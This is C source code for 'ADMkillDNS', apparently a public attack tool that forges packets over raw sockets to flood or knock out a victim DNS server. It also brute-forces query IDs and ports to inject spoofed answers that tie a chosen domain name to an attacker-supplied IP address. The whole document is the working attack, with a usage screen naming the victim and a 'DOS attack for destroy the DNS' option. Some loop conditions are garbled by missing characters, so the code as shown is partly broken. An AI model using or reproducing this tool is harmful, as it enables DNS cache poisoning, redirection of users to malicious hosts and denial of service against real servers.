#include "ADM-spoof.c" #include "dns.h" #include "ADMDNS2.c" #define ERROR -1 #define VERSION "0.3 pub" #define ID_START 1 #define ID_STOP 65535 #define PORT_START 53 #define PORT_STOP 54 void main(int argc, char **argv) { struct dnshdr *dns; char *data; char buffer2[4000]; unsigned char namez[255]; unsigned long s_ip,s_ip2; unsigned long d_ip,d_ip2; int sraw, i, on=1, x, loop, idstart, idstop, portstart, portstop; if(argc <5){ system("/usr/bin/clear"); printf(" usage : %s \n\t[A,B,N] [ID_START] [ID_STOP] [PORT START] [PORT STOP] \n",argv[0]); printf(" ip src: ip source of the dns anwser\n"); printf(" ip dst: ip of the dns victim\n"); printf(" name : spoof name ex: www.dede.com\n"); printf(" ip : the ip associate with the name\n"); printf(" options \n"); printf(" [A,B,N] \n"); printf(" A: flood the DNS victim with multiple query\n"); printf(" B: DOS attack for destroy the DNS \n"); printf(" N: None attack \n\n"); printf(" [ID_START] \n"); printf(" ID_START: id start :> \n\n"); printf(" [ID_STOP] n"); printf(" ID_STOP : id stop :> \n\n"); printf(" PORT START,PORT STOP: send the spoof to the portstart at portstop\n\n"); printf("\033[01mADMkillDNS %s (c) ADM\033[0m , Heike \n",VERSION); exit(ERROR); } dns = (struct dnshdr *)buffer2; data = (char *)(buffer2+DNSHDRSIZE); bzero(buffer2,sizeof(buffer2)); if( (sraw=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == ERROR){ perror("socket"); exit(ERROR); } if((setsockopt(sraw, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) == ERROR){ perror("setsockopt"); exit(ERROR); } printf("ADMkillDNS %s",VERSION); printf("\nouais ben mwa je dedie ca a ma Heike"); printf("\nREADY FOR ACTION!\n"); s_ip2=s_ip=host2ip(argv[1]); d_ip2=d_ip=host2ip(argv[2]); if(argc>5)if(*argv[5]=='A') { for(loop=0;loop<10;loop++){ dns->id = 6000+loop; dns->qr = 0; dns->rd = 1; dns->aa = 0; dns->que_num = htons(1); dns->rep_num = htons(0); i=makepaketQS(data,argv[3],TYPE_A); udp_send(sraw,s_ip,d_ip,1200+loop,53,buffer2,DNSHDRSIZE+i); s_ip=ntohl(s_ip); s_ip++; s_ip=htonl(s_ip); } } /* end of DNS flood query */ /* ici on trouve la routine contre un DOS */ if(argc>5)if(*argv[5]=='B') { s_ip=host2ip(""); dns->id = 123; dns->rd = 1; dns->que_num = htons(1); printf("plz enter the number of packet u wanna send\n"); scanf("%i",&i); for(x=0;x 6 )idstart = atoi(argv[6]); else idstart = ID_START; if(argc > 7 )idstop = atoi(argv[7]); else idstop = ID_STOP; if(argc > 8 ){ portstart = atoi(argv[8]); portstop = atoi(argv[9]); } else { portstart = PORT_START; portstop = PORT_STOP; } bzero(buffer2,sizeof(buffer2)); bzero(namez,sizeof(namez)); i=0; x=0; s_ip=s_ip2; d_ip=d_ip2; for(;idstartid = htons(idstart); dns->qr = 1; dns->rd = 1; dns->aa = 1; dns->que_num = htons(1); dns->rep_num = htons(1); printf("send awnser with id %i to port %i at port %i\n",idstart,portstart,portstop); i=makepaketAW(data,argv[3],argv[4],TYPE_A); for(;x < portstop; x++) udp_send(sraw,s_ip,d_ip,53,x,buffer2,DNSHDRSIZE+i); x = portstart; } printf(" terminated..\n"); }